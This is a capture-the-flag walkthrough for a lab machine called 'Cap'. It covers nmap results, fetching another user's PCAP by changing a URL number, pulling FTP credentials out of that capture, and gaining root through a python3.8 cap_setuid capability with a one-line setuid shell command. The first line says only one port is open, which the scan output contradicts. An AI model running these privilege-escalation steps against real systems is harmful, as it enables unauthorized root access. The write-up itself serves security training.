The nmap scan reveals only one port: Port 80 with a apache web server.
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA) | 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA) |_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d🇩🇪b3🇩🇪b2:18 (ED25519) 80/tcp open http gunicorn | fingerprint-strings:
The website shows a “security dashboard”.
After looking around a bit, I noticed that we can download PCAP data from
/data/1, where the number is incrementing with each request. So with a bit of fuzzying, it turns out that there is also
/data/0, with records that were created by some other user. Let’s download it and analyze it in Wireshark.
Inside the log data, we find a FTP login by a user “nathan” and the password “Buck3tH4TF0RM3!”. On the FTP server, we find the user flag. The password also works for the SSH login. Next, I ran linpeas. It showed a vulnerability for two CVEs.
╔══════════╣ CVEs Check Vulnerable to CVE-2021-4034 Vulnerable to CVE-2021-3560
Also it shows a capability for the python3.8 binary:
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
Since the box is called “cap”, this might be the intended attack vector. On GTFObins, we find the following entry for Capabilities:
If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.
Next, we execute the command as specified and get a root shell.
$ ./python -c 'import os; os.setuid(0); os.system("/bin/sh")'